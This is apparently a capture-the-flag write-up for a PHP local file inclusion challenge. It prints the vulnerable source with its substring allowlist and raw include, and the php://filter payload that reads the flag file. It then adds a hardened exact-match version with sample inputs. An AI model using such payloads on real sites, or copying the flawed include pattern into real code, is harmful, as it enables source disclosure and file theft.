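There is a GET parameter here that looks like a file inclusion point.
Try: php://filter/convert.base64-encode/resource=index.php
This returns an error.
The path ends up with two extensions (the script appends .php itself), so we drop one.
This returns the source code: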
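<?php
// User-controlled value taken straight from the query string
$file = $_GET['category'];
if (isset($file))
{
    // Substring match only: any string containing one of these words passes.
    // The "index" test has no !== false, so "index" at offset 0 does not pass.
    if (strpos($file, "woofers") !== false || strpos($file, "meowers") !== false || strpos($file, "index")) {
        // The request value is concatenated into the include path
        include ($file . '.php');
    } else {
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>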
The category parameter must contain woofers, meowers, or index.
payload:
?category=php://filter/convert.base64-encode/index/resource=flag
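
The check fails because it accepts any string that merely contains an allowed word, and the request value still goes into include. A hardened version of the same routing, as an added example that is not part of the original write-up (the pages/ directory and the resolve_category helper are assumptions):

```php
<?php
// Added example: hardened replacement for the include logic shown above.
// The page names (woofers, meowers, index) come from the challenge source;
// the pages/ directory layout is an assumption.

const PAGES = [
    'woofers' => 'woofers.php',
    'meowers' => 'meowers.php',
    'index'   => 'index.php',
];

// Hypothetical helper: returns the file to include, or null if the
// category is not one of the exact allowlisted names.
function resolve_category($category): ?string
{
    // Exact key match, not a substring test: stream wrappers such as
    // php://filter/..., traversal sequences and extra path components
    // can never equal an allowlisted key. Non-string input (for example
    // ?category[]=x) is rejected as well.
    if (!is_string($category) || !array_key_exists($category, PAGES)) {
        return null;
    }
    // The path is built from the constant table, never from the request.
    return __DIR__ . '/pages/' . PAGES[$category];
}

// Constructed sample inputs, including the payload from this write-up.
$samples = [
    'woofers',
    'index',
    'php://filter/convert.base64-encode/index/resource=flag',
    'woofers/../flag',
    ['woofers'],
];

foreach ($samples as $sample) {
    $path  = resolve_category($sample);
    $label = is_string($sample) ? $sample : '(array input)';
    echo str_pad($label, 58), ' => ',
         $path === null ? 'rejected' : basename($path), PHP_EOL;
}
```

In the real handler the result would be used as `$path = resolve_category($_GET['category'] ?? null);` followed by an include only when `$path` is not null.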